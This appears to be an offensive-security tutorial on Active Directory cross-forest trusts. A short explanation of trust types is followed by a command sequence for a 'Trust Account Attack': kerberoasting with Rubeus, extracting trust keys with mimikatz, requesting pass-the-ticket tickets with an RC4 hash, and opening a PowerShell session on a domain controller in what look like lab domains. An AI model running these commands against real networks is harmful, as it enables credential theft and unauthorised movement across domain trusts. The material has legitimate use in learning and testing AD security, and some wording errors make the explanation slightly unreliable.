In Active Directory (AD), a trust is a connection between the authentication systems of two domains, allowing users from one domain to access resources in another. Trusts exist both within a single AD forest and between separate forests (cross-forest trusts). There are many ways to attack cross-forest trusts.
Types of Cross-Forest Trusts
- External Trust: Connects 2 separate domains in different hosts, that do not have a forest trust, and uses SID filtering to prevent SID History abuse.
- Forest Trust: Connects 2 entire entire AD forest allowing users from one forest to authenticate across all domains in the other forest. If Domain A trusts Forest X, then any user from Forest X can access any domain in Forest A.
| One-Way Trust | Two-Way Trust | |
|---|---|---|
| Direction of Access | Trusted → Trusting | Both ways (Bidirectional) |
| Who Can Access What? | Users in the trusted domain can access the trusting domain, but not vice versa. | Users from both domains/forests can access each other's resources. |
| Common Use Case | A parent company allows employees from a subsidiary to access shared resources, but not the other way around. | Common in large organizations where domains need to share resources freely. |
| Security Risk | Lower risk, as access is limited to one direction. | Higher risk, since a compromise in one domain/forest can affect the other. |
In a nutshell
- AD trusts allow users in different domains/forests to access resources.
- External Trusts are more restrictive and use SID Filtering.
- Forest Trusts are more flexible but riskier because they allow full authentication across forests.
- One-Way Trusts allow access in only one direction, while Two-Way Trusts allow access in both directions.
- Attackers can abuse trust relationships if security is not properly configured.
Kerberoasting targeting a Domain
.\Rubeus.exe kerberoast /domain:logistics.ad /user:hollyTrust Account Attack
In above example we see a one-way trust from Forest A to Forest B, the access works from A to B but not the other way around. To brake this rule we can perform a Trust Account Attack.
When a trust is created, a trust account (A$) is automatically created in Forest-B. This account is just a regular domain user in Forest-B. Attackers in Forest-A can steal the credentials of this trust then login to Forest-B bypassing one-way restriction.
# Enumerate
Get-ADTrust -Identity megacorp.ad
# SharpHound domain
.\SharpHound.exe -c All -d megacorp.ad
# Extract Forest Trust Keys
.\mimikatz.exe "lsadump::trust /patch" exit
# Request ticket for logistics$
.\Rubeus.exe asktgt /user:logistics$ /domain:megacorp.ad /rc4:68e456d3a95cc748ac5a2eae679b9c91 /ptt
# Kerberoast
.\Rubeus.exe kerberoast /domain:megacorp.ad
# Or request a ticket
.\Rubeus.exe asktgt /user:white.beard /password:<SNIP> /domain:megacorp.ad /ptt
# New PS Session
New-PSSession DC03.megacorp.ad